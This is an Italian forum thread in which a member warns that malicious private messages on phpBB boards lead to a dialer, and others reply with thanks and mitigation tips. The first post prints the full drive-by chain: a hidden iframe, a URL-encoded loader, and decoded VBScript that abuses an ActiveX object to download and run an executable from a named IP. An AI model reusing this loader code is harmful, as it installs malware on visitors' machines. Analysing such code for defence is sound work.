virus nei pm (nei Forum phpBB, non nel nostro!)

[Rough]

SE RICEVETE UN MP CON OGGETTO "ALCUNI PENSANO VOI", "CIAO" O DA UTENTI CON UN NICK STRANO,

NON APRITE IL LINK ALL'INTERNO DEL MESSAGGIO PRIVATO IN QUANTO SI TRATTA DI VIRUS.

il fatidico pm con un link include un iframe che linka a un JavaScript document.write che costruisce un script:

Codice:

<html>
  <title>under construction</title>
  <body>
    <iframe src="http://195.225.176.34/user2/bond0167/index.php" width=1 height=1></iframe>
    <center><font size=12><b>under construction </b></font></center>
    <table height=100%>
      <tr height=100% valign=bottom>
       <td>
          <!--LiveInternet counter-->
         <script type="text/javascript">
           <!--
            document.write('<a href="http://www.liveinternet.ru/click" ' +
            'target=_blank><img src="http://counter.yadro.ru/hit?t44.6;r'+
            escape(document.referrer)+((typeof(screen)=='undefined')?'':
            ';s'+screen.width+'*'+screen.height+'*'+(screen.colorDepth?
            screen.colorDepth:screen.pixelDepth))+';u'+escape(document.URL)+
            ';'+Math.random()+
            '" alt="" title="LiveInternet" '+
            'border=0 width=31 height=31><\/a>')
         //-->
        </script><!--/LiveInternet-->
        </td>
     </tr>
    </table>
  </body>
</html>

il file php nell'iframe è:

Codice:

<script type="text/javascript">
<!-- var var33122251183=(
'%3C%53%43%52%49%50%54%20%6C%61%6E%67%75%61%67%65%3D%22%56%42%53%63'+
'%72%69%70%74%22%3E%0D%0A%20%20%20%20%49%66%20%6E%61%76%69%67%61%74'+
'%6F%72%2E%61%70%70%4E%61%6D%65%3D%22%4D%69%63%72%6F%73%6F%66%74%20'+

... altre 100 righe

'%20%45%6E%64%20%49%66%0D%0A%20%20%20%0D%0A%20%20%20%20%45%6E%64%20'+
'%49%66%0D%0A%20%20%20%20%45%6E%64%20%49%66%0D%0A%20%20%20%0D%0A%3C'+
'%2F%53%43%52%49%50%54%3E%0D%0A%0D%0A');
document.write(var33122251183);
</Script>

il risultato è:

Codice:

<script language="VBScript">
    If navigator.appName="Microsoft Internet Explorer" Then
    If InStr(navigator.platform,"Win32") <> 0  Then

    Dim Obj_Name
    Dim Obj_Prog
   
    set obj_RDS = document.createElement("object")
    obj_RDS.setAttribute "id", "obj_RDS"
    obj_RDS.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
   
    fn = "226184122185.exe"
    Obj_Name = "Shell"   
    Obj_Prog = "Application"   
    set obj_ShellApp = obj_RDS.CreateObject(Obj_Name & "." & Obj_Prog,"")
    Set oFolder = obj_ShellApp.NameSpace(20)
    Set oFolderItem=oFolder.ParseName("Symbol.ttf")
    Font_Path_Components=Split(oFolderItem.Path,"\",-1,1)
    WinDir= Font_Path_Components(0) & "\" &  Font_Path_Components(1) & "\"
    fn=WinDir & fn
     
    Obj_Name = "Microsoft"   
    Obj_Prog = "XMLHTTP"   
    set obj_msxml2 = CreateObject(Obj_Name & "." & Obj_Prog)
    obj_msxml2.open "GET","http://195.225.176.34/user2/bond0167/service32.exe",False
    obj_msxml2.send
    On Error Resume Next
   
    Obj_Name = "ADODB"   
    Obj_Prog = "Stream"   
    set obj_adodb = obj_RDS.CreateObject(Obj_Name & "." & Obj_Prog,"")
    If Err.Number Then
   
    Obj_Name = "Scripting"   
    Obj_Prog = "FileSystemObject"   
    Set obj_FileSys=obj_RDS.CreateObject(Obj_Name & "." & Obj_Prog,"")
    Set download_file=obj_FileSys.CreateTextFile(fn, TRUE)
    download_file_size=LenB(XMLBody)
    For i=1 To download_file_size
    cByte=MidB(XMLBody,i,1)
    ByteCode=AscB(cByte)
    download_file.Write(Chr(ByteCode))
    Next
    download_file.Close
   
    Obj_Name = "WScript"   
    Obj_Prog = "Shell"   
    Set  obj_WShell=obj_RDS.CreateObject(Obj_Name & "." & Obj_Prog,"")
    On Error Resume Next
    obj_WShell.Run fn,1,FALSE
    Else
    obj_adodb.Type=1
    obj_adodb.Open
    obj_adodb.Write(obj_msxml2.responseBody)
    obj_adodb.SaveToFile fn,2
    obj_ShellApp.ShellExecute fn
    End If
   
    End If
    End If
   
</SCRIPT>

tutte le board programmate in phpBB possono presentare il problema quindi occhio; per chi comunque fosse caduto nella trappola: viene scaricato il file service32.exe che genera a sua volta i files it_0167.exe e winsyst32.exe contenuti in c:\temp ed inizia a modificare i BHO di explorer... consiglio a chi è caduto in questo tranello di scaricarsi ed installare Spyware Terminator (che è freeware) o, meglio ancora, StopDialers.

[AVP191]

grazie

[Saraceno]

Grazie!!!

[gp.triple]

lavora solo sugli exe??da buon utente linux ne dovrei essere immune...
grazie dell'info comunque

[Rough]

si gp...è un maledetto dialer, la provenienza è h**p://195.225.176.34/user2/bond0167...mi raccomando NON LO VISITATE

[gp.triple]

si gp...è un maledetto dialer, la provenienza è h**p://195.225.176.34/user2/bond0167...mi raccomando NON LO VISITATE

ok grazie mille rough!

[Marco Manila]

Rough, detto così sembra che ci sia un virus nei pm del nostro Forum, mentre alla fine ti riferisci a quelli programmati in phpBB, mentre in nostro è un Vbulletin.

Mi confermi che non ne hai ricevuti di pm simili da noi?

[fabiomugello]

vabbè comunque grazie!

[Rough]

certo boss...nessun pm da qui...
ma leggevo in rete (sempre per lavoro) e sembra che sia più bastardo dei soliti sto' qua...qualcuno paventava l'attaccabilità anche di vb ma per ora nessun caso noto... ma la prudenza non è mai troppa

[D@lyn]

è un buco di phpBB non su Vbulletin come detto da Marco adesso non ho fatto caso a che impostazioni ci sono nei msg privati ma per tagliar la testa al toro basta disabilitare i tag html nei pm